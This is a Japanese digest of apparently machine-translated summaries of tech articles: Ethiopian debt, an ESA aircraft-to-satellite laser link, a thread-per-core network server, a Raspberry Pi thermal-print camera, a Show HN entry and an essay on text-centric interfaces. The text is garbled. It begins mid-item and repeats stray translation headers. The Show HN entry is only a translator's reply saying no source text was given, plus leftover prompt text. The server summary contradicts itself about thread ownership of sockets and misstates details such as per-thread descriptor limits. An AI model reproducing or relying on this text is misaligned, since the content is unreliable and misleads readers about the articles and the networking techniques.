エチオピアの外貨準備高は枯渇しており、3月末時点で債務ポートフォリオは282億ドルです。財務大臣は外国為替不足によるユーロボンド返済の遅延を報告し、エチオピアがIMFから緊急支援パッケージ（まだ合意に至っていない）を求めていると述べました。国は最近、中国債権者への債務支払い一時免除を確保し、二国間債権者とのさらなる債務救済について原則上の合意を得ています。このような状況下で、世界銀行の資金は限られた外貨を管理しつつ、国全体の債務救済交渉を進める上で重要な役割を果たす可能性があります。

世界初：機体と静止軌道衛星間のギガビットレーザーリンク

## Japanese Translation: > 欧州宇宙機関（ESA）、エアバス防衛・スペース、TNO、およびTESATは、航空機と静止軌道衛星Alphasat TDP‑1との間でエラーのないレーザーリンクを成功裏に実証しました。フランスのニムス上空で行われた試験飛行中、Airbus UltraAir端末は高速移動し雲が発生した状態でも数分間にわたり2.6 Gbps のデータレートを達成し、過酷な条件下で信頼性の高い接続を証明しました。レーザー通信は光線が広がりにくく、より多くの情報を運ぶことができるため、無線周波数よりも安全なリンクを提供します。UltraAir端末は、ESA の ScyLight プログラムの一部であり、光学・量子通信を対象とした大規模な ARTES 取り組みの中に位置付けられています。ScyLight はオランダ宇宙局（NSO）およびドイツ航空宇宙機関（DLR）の支援も受けています。 > > ESA のレジリエンス・ナビゲーション・コネクティビティ部門長であるラウレンヌ・ジャファルトは、このマイルストーンが欧州加盟国の安全な接続を強化する方法について説明しました。TNO の宇宙担当ディレクター、キース・ブイスロッゲは、レーザー技術によるヨーロッパのセキュリティと自律性の向上を強調しました。エアバス防衛・スペースのコネクテッドインテリジェンス責任者であるフランソワ・ロンバールは、遠距離にわたる移動対象をリンクする際に必要な極めて高い精度について述べました。ESA の光学および量子通信オフィス長であるハラルド・ハウスチルトは、航空機と衛星ネットワーク（例：HydRON）間の高速スループット光リンクが商業用途やレジリエンスアプリケーションにとって優先事項であると述べました。

高速サーバー

## Japanese Translation: **概要：** この記事では、CPU コアごとに 1 本の固定スレッドを割り当てる高性能ネットワーク構成を紹介しています。各スレッドは独自の epoll/kqueue イベントループを所有し、専用のファイルディスクリプタプールを管理することで、共有された決定ポイントと競合を排除します。 1. **スレッド作成** は `pthread_create` を使用してデタッチ状態かつ `PTHREAD_SCOPE_SYSTEM` で行い、その後各スレッドが CPU アフィニティ (`pthread_setaffinity_np` または macOS のポリシー API) を設定します。 2. **ファイルディスクリプタ制限** は `setrlimit(RLIMIT_NOFILE)`（例：2048 個のディスクリプタ）で各スレッドごとに引き上げ、数多くの同時接続をサポートします。 3. **accept ループ** は専用リスナースレッドで実行され、`accept()` または `accept4()` を呼び出した後、新しいソケットを選択されたワーカーの epoll/kqueue に即座に登録します（`epoll_ctl` / `kevent`）。 4. 各ワーカースレッドは `epoll_wait`（Linux）または `kevent`（BSD/macOS）でイベントを処理します。イベント時には EOF/close フラグが設定されていればディスクリプタを閉じ、そうでなければリクエストハンドラー (`handle(fd)`) を呼び出します。ソケットは通常非ブロッキングに設定され、`SO_RCVTIMEO` でタイムアウトを持つ場合があります。 5. **状態遷移**（accept → read → write → close）は別々のスレッドで処理されます。クライアントのファイルディスクリプタは対応するワーカーキュー間で渡され、各 FD が常に 1 本のスレッドだけに所有されるようにします。 6. 設計では **TCP_DEFER_ACCEPT** を採用し、リッスンソケットのリーングを無効化（`SO_LINGER{onoff=1, linger=0}`）して遅延を低減しています。 7. 新規接続は単純なラウンドロビン `pick()` 関数でロードバランシングされ、ワーカーキューを順に巡回します。 8. このアーキテクチャは、分離されたスレッド上のブロッキング I/O 呼び出しと状態遷移を所有スレッドへルーティングすることで、最新ハードウェアで約 **100 k リクエスト/秒** を実現できます。 このモデルを採用すると、高接続量に対する CPU オーバーヘッドが低減され、クラウドサービスのスケーラビリティが向上し、開発者はイベントループロジックを簡素化できます。将来的な拡張としては、ワーカースレッドの動的スケーリング、ラウンドロビン以外の高度なロードバランシング、および `SO_RCVTIMEO` を用いたより細粒度のタイムアウト処理が考えられます。

「貧乏人のポラロイド」

## Japanese Translation: この記事では、Raspberry Pi Zero、PT‑310サーマルペーパー印刷機（中国から20〜60ユーロで購入）、FreeCADで作成した3Dプリントパーツを使用して、低コストで携帯型のDIYポラロイド風インスタントカメラを構築する方法を説明しています。各写真は0.01ユーロ未満で印刷でき、通常のポラロイド写真（約1ユーロ）よりも格段に安価です。また、50 m紙巻きは数ユーロ程度です。 **主要ハードウェア選択:** - **カメラ** – Raspberry Pi Zero と `picamera2` を使用し、解像度2000 × 2000 px。Pythonによる画像処理（ヒストグラム等化、ガンマ補正、CLAHE、コントラスト伸長）を実装しています。 - **プリンタ** – USBサーマルプリンタは `escpos` ライブラリで制御し、再印刷ボタンに対応します。 - **電源** – 画面と充電ポート付きのパワーバンクでバッテリー駆動。GPIO接続のシャットダウンボタンまたは手動スイッチでユニットをオフにできます。可変的な市販アダプタも可能ですが、長いケーブルは携帯性を損ねます。 **機械設計:** FreeCAD で作成した3Dプリントハウジングにはステータス LED（青＝電源オン、緑＝準備完了、赤＝撮影中）と、カメラが忙しい時に点灯する追加 LED を装着。GPIO ピンは電源、カメラ、再印刷ボタン、およびバッテリー過熱時に電力を遮断するためのサーミスターへ接続します。 **安全対策:** 保護用眼鏡を着用し、パワーバンクから鋭利な物体を遠ざけ、サーミスターで発熱防止機能を活用してください。 記事はさらに拡張アイデアも提示しています。追加 LED やボタン（例：温度計モジュール）の設置、機能拡張、およびオンラインでのデモ共有などです。詳細な部品リスト、配線図、コードスニペットにより、ホビイスト・教育者・小規模イベントベンダーが迅速にセットアップを再現できます。

**Show HN:** Kybernis – AI エージェントが同じ行動を二度実行しないようにする

## Japanese Translation: （翻訳対象のテキストが提供されていないため、ここに翻訳結果を記載できません。必要な原文をご提示いただければ、すぐに日本語へ変換いたします。） ## Text to translate **Original Summary** (unchanged)

**AI が普及するにつれて、UI は無意味になる**

## 日本語訳: （欠落している詳細を取り入れつつ、明瞭さを保ったもの） --- ## 要約 本書は、ソフトウェアインターフェースが複雑なダッシュボードから、テキスト中心またはコマンドライン (CLI) デザインへ移行していると主張します。これは、大規模言語モデル（LLM）にとってより扱いやすいフォーマットだからです。プレーンテキストのコマンドや設定ファイルを使用することで、AI エージェントは複雑な視覚的インタラクションなしにコードを読み取り、書き込み、実行できます。 この移行を示す主要な例： 1. **star‑history.com** – Vercel から Cloudflare に統一された DNS/ホスティング管理へ移行。Claude Code を使用した後は GitHub Actions のシークレットが数個だけで済みました。 2. **Cursor** – IDE 重視のツールから、AI がほとんどのルーチン作業を担当するタスクリスト中心のワークフローへ進化しました。 スクリプト可能で人間・AI 両方に優しいインターフェースを示す5つのプロジェクト： - **asciinema**：ターミナルセッションを軽量で再生可能なテキストファイルとして記録し、LLM が読み書きできるようにします。 - **Hurl**：プレーンテキストの `.hurl` ファイルで HTTP リクエストとアサーションを書けます。これにより LLM によって迅速な API テストスイートが構築できます。 - **Mermaid**：Markdown のような構文からフローチャート、シーケンス図、ER 図を生成します。LLM は既にこの構文を理解しています。 - **pgschema**：SQL で PostgreSQL スキーマを宣言的に管理し、マイグレーションファイルや ORM DSL を使わずに望ましい状態とデータベースを差分比較します。 - **Streamlit**：Python スクリプトをフロントエンドコードなしでインタラクティブな Web アプリに変換し、LLM が単一のプロンプトからダッシュボードを構築できるようにします。 全体的な傾向は、AI 自動化を促進し UI の複雑さを減らす原始的でテキスト中心のインターフェースへの回帰です。開発者がより速くプロトタイプを作成し、LLM を簡単に統合できるようになると、この動きは他のプラットフォームにも類似したミニマリスティックデザインを採用させ、チームがソフトウェアを構築・保守する方法を再形成する可能性があります。